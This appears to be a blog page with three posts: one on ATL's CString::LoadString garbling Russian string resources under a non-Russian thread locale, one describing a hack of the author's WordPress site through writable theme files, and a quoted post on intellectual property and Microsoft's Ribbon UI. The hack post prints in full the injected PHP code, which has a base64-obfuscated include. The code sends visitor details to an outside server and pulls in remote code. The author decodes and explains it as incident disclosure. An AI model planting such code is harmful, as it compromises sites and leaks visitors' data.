Fooling Around // Software Production Line

There has been an unexpected problem localizing application resources when STRING resources failed to load while there were no problems with other resource types. The source of the problem appears to be within ATL core. As long as CP_THREAD_ACP is involved in ATL’s conversion the loaded string is screwed.
The problem is illustrated by the sample. The same string resource is loaded with LoadString API and CString::LoadString ATL function. The difference is emphasized with bold below. As soon as Russian string is loaded from a thread with non-Russian thread locale, the string is screwed but only when loaded through ATL class (warning: Russian characters seems to be forged by WordPress in quoted text below):

C:\>ThreadLocaleSample01.exe
Default Thread Locale: 1033 (0×409), Primary Language 9 (0×9), SubLanguage 1 (0×1), Sort 0 (0×0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????
Russian Locale: 1049 (0×419), Primary Language 25 (0×19), SubLanguage 1 (0×1), Sort 0 (0×0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????
English Locale: 1033 (0×409), Primary Language 9 (0×9), SubLanguage 1 (0×1), Sort 0 (0×0)
String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
String 102: ????????????????????????????????
ATL String 101: ABCDEFGHIJKLMNOPQRSTUVWXYZ
ATL String 102: ????????????????????????????????

Read more »

A while ago I found the website irresponsible while administrative dashboard remained worked fine. It appeared to be a problem with hosting or ISP from the start but later when the problem did not appear to be going to go, I decided to check if my theme files are writable by the web server… and I found the engine of the blog hacked and hacked exactly through mentioned loophole.

It is convenient to have theme files accessible for write through web server because it allows theme modification using dashboard but this is insecure and finally someone used this. The update of the theme files seems to be automated (batch operation) because file some whitespace and formatting was lost (this may be a consequence of modification through engine dashboard though) and < /html> tag was stripped from the templates.

The following code was inserted into PHP template immediately before the < /body> tag (inserted once per source code  file into last PHP < ? tag before the < /body > tag, to be exact):

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
if((include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
{ include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

What is this? “aHR0cDovLw==” means “http://”, “dXNlcjcucGhwaW5jbHVkZS5ydQ==” stands for “user7.phpinclude.ru” and thus server and visitor information was sent to remote hacker’s server http://user7.phpinclude.ru/? … I am using this opportunity to say “Hi” or “Preved”, whichever is more appropriate, to our new friends from Russia…By the way, Google knows a lot about these guys already.

An educating post from Joe Andrieu on Microsoft’s Ribbon UI:

There are a few ways that courts currently recognize Intellectual Property protection. I’m not a lawyer, but I have taken a few classes and dealt with it as a technology entrepreneur. So, take this with a grain of salt, especially as I am likely to be too
broad or simplistic here.

The most likely protection they would use would be trademark, copyright, and
patent. These are often jointly described as
Intellectual Property, but are treated under the law differently. Microsoft is
also trying to establish a contractual agreement that
creates further protection.

Trademark only applies if the use confuses users into thinking the product is a
Microsoft product. That’s not too hard to
work-around as long as you aren’t mimicking office functionality directly.
Trademarks apply to marks on goods or services used in
commerce. It happens automatically upon use, but may be bolstered by labelling
(TM) and registration, which allows (R). It can also
be applied to trade “dress,” which is a unique presentation, packaging, or
appearance of a product.

Copyright applies to any expression of an idea, and particularly unique
expressions are definitely protected. It does not however,
apply to utility. That is, the function of the interface is not copyrightable,
only its expression, which I would interpret as its
unique visual characteristics. Copyright applies to all expressive (creative)
works, automatically; it does not require prior
approval by any agency.

Read more »